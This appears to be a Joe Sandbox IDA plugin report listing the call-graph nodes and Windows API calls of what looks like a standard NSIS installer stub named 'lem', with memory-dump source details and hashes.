405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 
3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 
3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 
3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 
3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 
API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 
406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API 
calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4938 402a84 4939 401553 19 API calls 4938->4939 4940 402a8e 4939->4940 4941 401446 18 API calls 4940->4941 4942 402a98 4941->4942 4943 401a13 4942->4943 4944 402ab2 RegEnumKeyW 4942->4944 4945 402abe RegEnumValueW 4942->4945 4946 402a7e 4944->4946 4945->4943 4945->4946 4946->4943 4947 4029e4 RegCloseKey 4946->4947 4947->4943 4948 402c8a 4949 402ca2 4948->4949 4950 402c8f 4948->4950 4952 40145c 18 API calls 4949->4952 4951 401446 18 API calls 4950->4951 4954 402c97 4951->4954 4953 402ca9 lstrlenW 4952->4953 4953->4954 4955 402ccb WriteFile 4954->4955 4956 401a13 4954->4956 4955->4956 4957 40400d 4958 40406a 4957->4958 4959 40401a lstrcpynA lstrlenA 4957->4959 4959->4958 4960 40404b 4959->4960 4960->4958 4961 404057 GlobalFree 4960->4961 4961->4958 4962 401d8e 4963 40145c 18 API calls 4962->4963 4964 401d95 ExpandEnvironmentStringsW 4963->4964 4965 401da8 4964->4965 4967 401db9 4964->4967 4966 401dad lstrcmpW 4965->4966 4965->4967 4966->4967 4968 401e0f 4969 401446 18 API calls 4968->4969 4970 401e17 4969->4970 4971 401446 18 API calls 4970->4971 4972 401e21 4971->4972 4973 4030e3 4972->4973 4975 405f51 wsprintfW 4972->4975 4975->4973 4976 402392 4977 40145c 18 API calls 4976->4977 4978 402399 4977->4978 4981 4071f8 4978->4981 4982 406ed2 25 API calls 4981->4982 4983 407218 4982->4983 4984 407222 
lstrcpynW lstrcmpW 4983->4984 4985 4023a7 4983->4985 4986 407254 4984->4986 4987 40725a lstrcpynW 4984->4987 4986->4987 4987->4985 4061 402713 4076 406009 lstrcpynW 4061->4076 4063 40272c 4077 406009 lstrcpynW 4063->4077 4065 402738 4066 40145c 18 API calls 4065->4066 4068 402743 4065->4068 4066->4068 4067 402752 4070 40145c 18 API calls 4067->4070 4072 402761 4067->4072 4068->4067 4069 40145c 18 API calls 4068->4069 4069->4067 4070->4072 4071 40145c 18 API calls 4073 40276b 4071->4073 4072->4071 4074 4062a3 11 API calls 4073->4074 4075 40277f WritePrivateProfileStringW 4074->4075 4076->4063 4077->4065 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4127 401a1f 4128 40145c 18 API calls 4127->4128 4129 401a26 4128->4129 4130 4062a3 11 API calls 4129->4130 4131 401a49 4130->4131 4132 401a64 4131->4132 4133 401a5c 4131->4133 4181 406009 lstrcpynW 4132->4181 4180 406009 lstrcpynW 4133->4180 4136 401a62 4140 406038 5 API calls 4136->4140 4137 401a6f 4138 406722 3 API calls 4137->4138 4139 401a75 lstrcatW 4138->4139 4139->4136 4142 401a81 4140->4142 4141 4062d5 2 API calls 4141->4142 4142->4141 4143 405e30 2 API calls 4142->4143 4145 401a98 CompareFileTime 4142->4145 4146 401ba9 4142->4146 4150 4062a3 11 API calls 4142->4150 4154 406009 lstrcpynW 4142->4154 4160 406805 18 API calls 4142->4160 4167 405ca0 MessageBoxIndirectW 4142->4167 4171 401b50 4142->4171 4178 401b5d 4142->4178 4179 405e50 GetFileAttributesW CreateFileW 4142->4179 4143->4142 
4145->4142 4147 404f72 25 API calls 4146->4147 4149 401bb3 4147->4149 4148 404f72 25 API calls 4151 401b70 4148->4151 4152 40337f 37 API calls 4149->4152 4150->4142 4155 4062a3 11 API calls 4151->4155 4153 401bc6 4152->4153 4156 4062a3 11 API calls 4153->4156 4154->4142 4162 401b8b 4155->4162 4157 401bda 4156->4157 4158 401be9 SetFileTime 4157->4158 4159 401bf8 FindCloseChangeNotification 4157->4159 4158->4159 4161 401c09 4159->4161 4159->4162 4160->4142 4163 401c21 4161->4163 4164 401c0e 4161->4164 4166 406805 18 API calls 4163->4166 4165 406805 18 API calls 4164->4165 4168 401c16 lstrcatW 4165->4168 4169 401c29 4166->4169 4167->4142 4168->4169 4170 4062a3 11 API calls 4169->4170 4172 401c34 4170->4172 4173 401b93 4171->4173 4174 401b53 4171->4174 4175 405ca0 MessageBoxIndirectW 4172->4175 4176 4062a3 11 API calls 4173->4176 4177 4062a3 11 API calls 4174->4177 4175->4162 4176->4162 4177->4178 4178->4148 4179->4142 4180->4136 4181->4137 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 
5040->5041 5042 4044df 5040->5042 5044 40451f GetDlgItem GetAsyncKeyState 5041->5044 5051 4045b1 5041->5051 5108 405c84 GetDlgItemTextW 5042->5108 5047 40453e GetDlgItem 5044->5047 5054 40455c 5044->5054 5045 4044ea 5048 406038 5 API calls 5045->5048 5046 40469d 5106 404833 5046->5106 5110 405c84 GetDlgItemTextW 5046->5110 5049 403d3f 19 API calls 5047->5049 5050 4044f0 5048->5050 5053 404551 ShowWindow 5049->5053 5056 403e74 5 API calls 5050->5056 5051->5046 5057 406805 18 API calls 5051->5057 5051->5106 5053->5054 5059 404579 SetWindowTextW 5054->5059 5064 405d59 4 API calls 5054->5064 5055 403dca 8 API calls 5060 404847 5055->5060 5061 4044f5 GetDlgItem 5056->5061 5062 40462f SHBrowseForFolderW 5057->5062 5058 4046c9 5063 40677e 18 API calls 5058->5063 5065 403d3f 19 API calls 5059->5065 5066 404503 IsDlgButtonChecked 5061->5066 5061->5106 5062->5046 5067 404647 CoTaskMemFree 5062->5067 5068 4046cf 5063->5068 5069 40456f 5064->5069 5070 404597 5065->5070 5066->5041 5071 406722 3 API calls 5067->5071 5111 406009 lstrcpynW 5068->5111 5069->5059 5075 406722 3 API calls 5069->5075 5072 403d3f 19 API calls 5070->5072 5073 404654 5071->5073 5076 4045a2 5072->5076 5077 40468b SetDlgItemTextW 5073->5077 5082 406805 18 API calls 5073->5082 5075->5059 5109 403d98 SendMessageW 5076->5109 5077->5046 5078 4046e6 5080 4062fc 3 API calls 5078->5080 5089 4046ee 5080->5089 5081 4045aa 5085 4062fc 3 API calls 5081->5085 5083 404673 lstrcmpiW 5082->5083 5083->5077 5086 404684 lstrcatW 5083->5086 5084 404730 5112 406009 lstrcpynW 5084->5112 5085->5051 5086->5077 5088 404739 5090 405d59 4 API calls 5088->5090 5089->5084 5094 406751 2 API calls 5089->5094 5095 404785 5089->5095 5091 40473f GetDiskFreeSpaceW 5090->5091 5093 404763 MulDiv 5091->5093 5091->5095 5093->5095 5094->5089 5097 4047e2 5095->5097 5098 4043ad 21 API calls 5095->5098 5096 404805 5113 403d85 EnableWindow 5096->5113 5097->5096 5099 40141d 80 API calls 5097->5099 5100 4047d3 5098->5100 5099->5096 5102 4047e4 

                                                                          Control-flow Graph [rendered graph image and node/edge dump not reproduced]
                                                                          APIs
                                                                          • #17.COMCTL32 ref: 004038A2
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                          • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                          • API String ID: 2435955865-239407132
                                                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                          Control-flow Graph [rendered graph image and node/edge dump not reproduced]
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
